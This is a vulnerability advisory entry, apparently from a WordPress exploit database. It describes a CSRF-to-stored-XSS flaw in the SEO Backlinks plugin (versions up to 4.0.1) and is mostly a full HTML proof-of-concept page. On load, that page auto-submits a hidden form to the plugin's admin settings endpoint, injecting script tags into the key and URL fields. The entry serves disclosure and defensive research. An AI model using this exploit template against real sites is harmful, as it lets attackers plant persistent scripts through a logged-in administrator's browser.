Lucene search

K
wpexploitWordfenceWPEX-ID:7CFEFCC9-ADBF-4AFC-B25F-92F417650359
HistoryJul 28, 2021 - 12:00 a.m.

SEO Backlinks <= 4.0.1 - CSRF to Stored XSS

2021-07-2800:00:00
Wordfence
116

0.001 Low

EPSS

Percentile

47.2%

The SEO Backlinks WordPress plugin is vulnerable to Cross-Site Request Forgery via the loc_config function found in the ~/seo-backlinks.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 4.0.1.

<!DOCTYPE html>

<html>
<head>
<meta charset="utf-8">
<title>CSRF PoC</title>
</head>

<body onload="csrfSubmit();">
<form target="dummyfrm" name="evilform" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=loc_menu" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="loc_sensitive" value="No" />
<input type="hidden" name="loc_target_blank" value="No" />
<input type="hidden" name="loc_back" value="Yes" />
<input type="hidden" name="key_1" value=""><script>alert(1)</script>" />
<input type="hidden" name="url_1" value=""><script>alert(1)</script>" />
<input type="hidden" name="key_2" value="" />
<input type="hidden" name="url_2" value="" />
<input type="hidden" name="submitted" value="" />
</form>
<iframe src="x" width="1" height="1" name="dummyfrm" style="visibility:hidden"></iframe>
<script>
function csrfSubmit(){
    let submit = HTMLFormElement.prototype["submit"].bind(document.evilform);
    submit();
}
</script>

<p>CSRF PoC</p>
</html>

0.001 Low

EPSS

Percentile

47.2%

Related for WPEX-ID:7CFEFCC9-ADBF-4AFC-B25F-92F417650359